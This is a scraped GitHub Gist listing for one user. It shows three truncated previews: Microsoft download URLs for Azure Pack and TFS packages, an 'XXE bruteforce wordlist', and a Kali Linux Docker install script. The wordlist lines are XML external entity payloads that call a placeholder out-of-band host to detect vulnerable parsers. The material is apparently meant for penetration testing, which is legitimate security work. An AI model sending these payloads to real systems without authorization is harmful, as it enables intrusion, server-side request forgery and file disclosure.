Skip to content

Instantly share code, notes, and snippets.

What would you need:

Hardware requirements

This file has been truncated, but you can view the full file.
https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/MgmtSvc-Usage.msi
https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/MgmtSvc-WebAppGallery.msi
https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/MgmtSvc-WindowsAuthSite.msi
https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/PrivacyStatement_RTM_2013.docx
https://download.microsoft.com/download/6/4/4/644F97FE-639D-4817-852A-905F224DC783/UR7.1-3.27.8196.0/THIRDPARTYNOTICES_RTM_2013.rtf
https://download.microsoft.com/download/0/B/5/0B523C6F-4B2C-4F3E-80B8-F8D7FE69A3EA/TFS2012-KB2989277.exe
https://download.microsoft.com/download/3/6/8/3683FA84-BDF4-479E-9E64-495AF6605EB2/TFS2013-KB2989279.exe
https://download.microsoft.com/download/3/B/5/3B5991CA-8B23-4A18-9DB5-1EDB867AD508/Microsoft%20Azure%20Certification%20Test%20Tool%201.1%20for%20Hybrid%20Cloud.msi
@MushR00m
MushR00m / xxe-payloads.txt
Created September 17, 2020 01:50 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@MushR00m
MushR00m / install_docker.sh
Created July 4, 2017 15:03
Kali Linux 2017.1 Docker install script
#!/bin/bash
export DEBIAN_FRONTEND="noninteractive"
# remove previously installed Docker
apt-get purge lxc-docker*
apt-get purge docker.io*
# add Docker repo
apt -y install apt-transport-https ca-certificates dirmngr
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*